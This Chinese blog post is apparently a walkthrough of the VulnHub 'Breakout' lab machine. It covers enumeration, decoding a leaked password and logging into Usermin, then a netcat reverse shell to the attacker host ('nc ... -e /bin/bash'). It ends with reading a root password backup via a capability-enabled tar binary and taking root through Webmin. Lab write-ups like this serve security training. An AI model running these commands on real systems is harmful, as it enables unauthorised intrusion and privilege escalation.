Vulnhub_Breakout

最新推荐文章于 2024-02-02 23:18:31 发布
最新推荐文章于 2024-02-02 23:18:31 发布
阅读量597 收藏
点赞数
文章标签: linux java python docker centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/121896687
版权

e321534eae202e267f26eb59d828477b.gif

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.3.143
BreakOut:192.168.3.142

信息收集

使用nmap探测目标主机端口4个端口,并且3个为http

nmap -A -p- -T4 -v 192.168.3.142

05e314246d3e00b5ff4dfe4b73506aed.png
访问80端口是一个默认的apache httpd的页面
8ebdda891fe263e1c0e502a262e4254c.png
查看网页源码在最下面发现一行注释

don't worry no one will get here, it's safe to share with you my access. Its encrypted :)


++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

167483caee21c8e2199d6d7c97e7fef4.png
解密后得到一个看起来像密码的东西

.2uqPEfj3D<P'a-3

26b65dbc8283e72be2911e0453d896da.png
访问10000端口看到时一个登录页面
35fadf2798e9e19fbf31e55b4dc203c4.png
访问20000端口也是一个usermin的登录页面
fc14e21e62f87c8af4acc2c28cd92062.png
使用whatweb获取到了两个端口程序的版本信息
74473afa08e35e4645021512e4f2c961.png
使用默认口令无法登录到两个系统,然后对445端口进行探测发现一个用户名

enum4linux -A 192.168.3.142

72f60229d6bc0a03e53279ad51af2c8a.png
经过尝试使用用户名cyber和之前获得的密码登录到了usermin
e513f86b84c93d27c77571fec1db8e28.png
在文件管理中找到一个user.txt下载后查看找到第一个flag

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

cf17ac6f99dcbdcb9b983ef2a8b4bb5b.png
进一步查看后发现tar具有root权限
1da52e7717534ce7b9e53a9499c0bccb.png

GETSHELL

查看web页面发现有一个可以执行命令的地方
31cc1c4283f6fe255657dd9e6a8b83fe.png
执行后发现这正是以cyber权限在执行的shell命令
ec8d82370bcb6d58b18833ce1632c61a.png
执行nc后发现这台服务器有nc命令
46d71fa61a9a804be246c9abc9ab8e99.png
执行反弹shell

监听:nc -lvvp 4321
反弹:nc 192.168.3.143 4321 -e /bin/bash

0f1a2e356b0c7a0b7e109c557614b3df.png
使用python获取一个tty shell

python3 -c 'import pty; pty.spawn("/bin/bash");'

baa713f9a3537f6fde38f62620cb7926.png
使用getcap命令来查看这个可执行文件的权限,通过下面的对照,我们可以获得这个tar文件可以读取任意文件
d4eb82211e3c4aaac0f2fd1306a852df.png

CAP_CHOWN:修改文件属主的权限
CAP_DAC_OVERRIDE:忽略文件的DAC访问限制
CAP_DAC_READ_SEARCH:忽略文件读及目录搜索的DAC访问限制
CAP_FOWNER:忽略文件属主ID必须和进程用户ID相匹配的限制
CAP_FSETID:允许设置文件的setuid位
CAP_KILL:允许对不属于自己的进程发送信号
CAP_SETGID:允许改变进程的组
IDCAP_SETUID:允许改变进程的用户
IDCAP_SETPCAP:允许向其他进程转移能力以及删除其他进程的能力
CAP_LINUX_IMMUTABLE:允许修改文件的IMMUTABLE和APPEND属性标志CAP_NET_BIND_SERVICE:允许绑定到小于1024的端口
CAP_NET_BROADCAST:允许网络广播和多播访问
CAP_NET_ADMIN:允许执行网络管理任务
CAP_NET_RAW:允许使用原始套接字
CAP_IPC_LOCK:允许锁定共享内存片段
CAP_IPC_OWNER:忽略IPC所有权检查
CAP_SYS_MODULE:允许插入和删除内核模块
CAP_SYS_RAWIO:允许直接访问/devport,/dev/mem,/dev/kmem及原始块设备CAP_SYS_CHROOT:允许使用chroot()系统调用
CAP_SYS_PTRACE:允许跟踪任何进程
CAP_SYS_PACCT:允许执行进程的BSD式审计
CAP_SYS_ADMIN:允许执行系统管理任务,如加载或卸载文件系统、设置磁盘配额等
CAP_SYS_BOOT:允许重新启动系统
CAP_SYS_NICE:允许提升优先级及设置其他进程的优先级
CAP_SYS_RESOURCE:忽略资源限制
CAP_SYS_TIME:允许改变系统时钟
CAP_SYS_TTY_CONFIG:允许配置TTY设备
CAP_MKNOD:允许使用mknod()系统调用
CAP_LEASE:允许修改文件锁的FL_LEASE标志

然后查找文件目录找到一个密码备份文件,但是我们无法直接读取,首先将文件使用cyber下的tar进行打包
20becf8467c00ab6ae9bd92412ad32f6.png
解压后查看文件得到密码
ed87c0913cfcdb33cec044799289bef7.png

提权

使用得到的密码登录webmin可以正常登录
301c40b1c0147dcf45cbd973557de12e.png
在查看系统功能的时候发现可以修改密码
02be839d502fcff4f18dc73308e05dd5.png
6cfce07a19fb1e7a8beccb1b7cbec0c7.png
当连接的时候发现连接被拒绝,因为ssh没有监听
70fa5f04def30d9ed2f85a5bc959548d.png
我们在用户和组配置中将cyber添加进root组
c02df20c18de7b64c86ea8179cfdea32.png
并且将user id修改为0
71de617c203fbadd10625f5e1e30831f.png
然后在usermin中查看用户的权限
33d074d3357b14d24c52cd96e787ddda.png
最终进入root用户拿到Flag
6bdd9d386753940d827210818f0f1734.png

加入我的星球

61a66618c82e10d6c9e773b764521dd2.png

下方查看历史文章

fc0f6efbe78ff4d75aad1f1f6860e114.png

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

b0565201f86f6b803cba827c64db7acd.png

NowSec
关注
daily_breakout_ea
08-05
Daily_breakout_ea D1、W1、MN1 GU、EU、Gold 突破剥头皮。 回测: :hot_beverage: 给我买杯咖啡 GU Ticket Manager 数据当前点差 GU Ticket Manager 数据可变点差 GBPUSD 票务管理器数据逐年可变点差 EURUSD ...
vulnhub】DC9
开心星人的博客
07-15 666
使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。80端口开放,22端口filtered(端口状态filtered端口状态filtered由于报文无法到达指定的端口,nmap不能够决定端口的开放状态。因为是POST传参的,所以我们想用bp抓个包,保存为1.txt,然后使用sqlmap的-r参数即可。在janitor的加目录下发现一个字典,加入到我们的密码字典里面去,继续爆破ssh服务。...
vulnhub breakout
qq_62144749的博客
08-15 1354
1
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Breakout
Aluxian_的博客
06-23 1434
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 768
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权。
VulnHub靶场----BreakOut
qq_61670993的博客
10-21 1095
小菜鸡一枚
codes.rar_BreakOut EA_London Breakout_breakout_ea_irisfx ea
07-14
first,IrisFx,London Breakout EA-V4.0EA,Moving Average,universalMACrossEA
frontend_breakout
03-20
cd进入backend_breakout_api目录并运行npm install以安装所有必需的模块。 输入rails db:migrate以运行数据库迁移。 通过输入rails s启动应用程序。 cd ..返回到keyboard_breakout目录。 最后,使用cd进入fron
breakout_breakout_powerbuilder_
09-30
《PB中的Breakout游戏开发详解》 在信息技术领域,编程游戏是学习编程和软件开发的绝佳途径。"Breakout",又称打砖块,是一款经典的街机游戏,因其简单而富有挑战性的玩法深受程序员喜爱。在PowerBuilder(简称PB)...
Fractal_Breakout_Modified.zip_breakout_chargemzf_theseky9_斐波那契ea
07-13
Fractal Breakout Modified EA根据分形、ATR、斐波那契信号在进行交易。EA仅为MQL编程爱好者提供语法及相关编程技巧的学习研究之用,智能交易存在极高的风险测试请用模拟盘,请勿用于实盘。
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
VulnHub靶机渗透实战7-BREAKOUT
随心所欲不逾矩
11-18 362
靶机超级简单。靶机和Kali桥接。
Vulnhub项目:Breakout
Ays.Ie的博客
04-15 399
本篇记录了vulhub靶机:breakout的整个渗透过程,希望能够帮助到有需要的人
打靶分享:VulnHub-Breakout
最新发布
weixin_66249173的博客
02-02 1754
最终在/var/backups目录下发现了一个.old_pass.bak看着像个密码,但是没有查看权限,此时我就想到了可以用tar进行压缩再解压,最终得到了一个密码,猜测是root密码。在 Linux 中,文件能力允许进程执行一些超出普通权限的操作,而无需完全的超级用户权限。SMB 协议通常用于在局域网中实现文件和打印机共享,而 Samba 则是 Linux 和其他类 Unix 系统上的一个实现,发现就是个普通的界面,查看源码(这里要仔细查看,并且翻到底。切换时发现会出现失败的情况,所以反弹shell。
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3724
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
vulnhub Breakout渗透
qq_45455136的博客
08-01 943
vulnhub Breakout渗透 信息收集 Usermin利用 信息收集 kali使用Nmap扫描存活主机,靶机ip为136
VulnhubBREAKOUT靶机
qq_63283137的博客
10-10 562
smb服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。可以配置操作系统内部,如用户,磁盘配额,服务或配置文件,以及修改和控制开源应用程序。每当看到二进制文件的副本时,都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户,与解密出的密码尝试登录webmin。再分析扫描出的信息,发现端口服务是smb。发现密码备份文件,但是没有任何的权限。
vulnhub Breakout靶机渗透
weixin_67567251的博客
10-13 1108
vulnhub Breakout靶机渗透
vulnhub靶机BREAKOUT
weixin_53665747的博客
06-23 165
这次学到了一些对smb服务的具体利用,同时也进一步理解了tar指令的一些操作。可能渗透测试就是这样,攻击链清晰了基本上让初学者来都能做,但是一旦你迷失了,那么难度从各个方面都会增加。
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值